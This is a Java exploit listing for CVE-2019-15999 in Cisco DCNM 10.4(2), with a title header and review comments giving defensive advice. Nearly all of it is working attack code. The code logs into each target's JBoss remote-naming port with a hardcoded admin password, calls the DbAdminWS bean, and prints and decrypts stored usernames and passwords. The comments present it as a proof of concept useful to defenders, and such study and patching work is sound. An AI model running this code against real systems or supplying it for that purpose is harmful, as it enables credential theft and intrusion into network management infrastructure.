# Exploit Title: Cisco DCNM JBoss 10.4 - Credential Leakage
# Date: 2020-01-06
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2)
# Version: 10.4(2)
# CVE: CVE-2019-15999

# You'll need a few .jars from a copy of Cisco DCNM to compile and run this code
# To compile, file path should match ${package}/${class}.java, e.g.,
# com/whatdidibreak/dcnm_expl/Main.java
# Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...]

package com.whatdidibreak.dcnm_expl;

import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI;
import com.cisco.dcbu.jaxws.wo.DBRowDO;
import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter;

import java.util.Properties;

import javax.naming.Context;
import javax.naming.InitialContext;

/**
 * Proof of concept for CVE-2019-15999 against Cisco DCNM 10.4(2), per the header of this file.
 *
 * <p>For every host named on the command line, the program opens a JBoss remote-naming context
 * on TCP port 4447 with one fixed principal/credential pair, looks up the {@code DbAdminWS}
 * bean, and prints each non-empty server property whose name contains "user" or "pass".
 *
 * <p>What this demonstrates, from a defender's point of view:
 * <ul>
 *   <li>The login pair is a literal in this file and is reused unchanged for every target, so the
 *       weakness shown is a credential that is not unique per installation.
 *       NOTE(review): presumably a built-in account shipped with the product; confirm against
 *       Cisco's advisory for this CVE and apply the fixed release it names.</li>
 *   <li>Values of "pass" properties are recovered by a vendor library routine that is called with
 *       the stored value alone (no key argument is passed here). Stored values should therefore
 *       be treated as recoverable by anyone able to read them; rotate every credential kept in
 *       the DCNM server properties once the appliance is patched.</li>
 *   <li>Everything depends on port 4447 being reachable. Limit that port to the hosts that need
 *       it and alert on connections to it from any other source.</li>
 * </ul>
 */
public class Main {

    /**
     * Runs the check against each command-line argument in turn.
     *
     * @param args host names or IP addresses, one per target
     * @throws Throwable any naming, lookup, remote-call or decrypt failure is propagated
     *     uncaught, so the first failing target ends the run
     */
    public static void main(String[] args) throws Throwable {
        for (String target : args) {
            System.out.println("Target: " + target);

            // JNDI environment for the JBoss remote-naming client.
            Properties jndiProps = new Properties();
            jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory");
            // The only per-target input is the host; the scheme and port are fixed.
            jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447");
            // Fixed principal and credential: identical for every target, which is the
            // security-relevant point of this listing.
            jndiProps.put(Context.SECURITY_PRINCIPAL, "admin");
            jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345");
            // Lets the same naming context be used for EJB lookups and invocations.
            jndiProps.put("jboss.naming.client.ejb.context", true);

            // NOTE(review): the context is never closed; one is created per target.
            Context ctx = new InitialContext(jndiProps);

            // Remote proxy for the DbAdminWS bean, typed by its vendor-supplied interface.
            DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI");

            // The argument to getServerProperties is passed as null; its meaning is not
            // visible in this file.
            for (DBRowDO row : i.getServerProperties(null).getRows()) {
                // Assumes each row carries the property name at [0] and its value at [1],
                // both non-null; verify against the vendor's DBRowDO definition.
                String propName = row.getEntry()[0];
                String propValue = row.getEntry()[1];

                if (propValue.isEmpty()) {
                    continue;
                }

                // Only names containing "user" or "pass" are reported; all other properties
                // are skipped silently.
                if (propName.contains("user")) {
                    System.out.println(propName + " = " + propValue);
                } else if (propName.contains("pass")) {
                    // Prints the stored value followed by the result of the vendor decrypt
                    // routine, showing that the stored form is reversible rather than a
                    // one-way hash.
                    System.out.println(propName + " = " + propValue
                            + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")");
                }
            }

            // Blank line between targets.
            System.out.println();
        }
    }
}